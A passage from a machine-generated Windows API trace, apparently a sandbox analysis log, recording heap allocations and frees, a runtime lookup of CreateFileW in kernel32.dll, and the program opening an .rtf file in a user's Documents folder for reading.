Size=0x10) returned 0x43cb138 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0080.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.691] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0c0 [0080.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0080.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.692] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0080.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0080.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\bbye6gx.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4e10 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0080.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0080.695] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4bf0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.697] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.697] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.698] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, 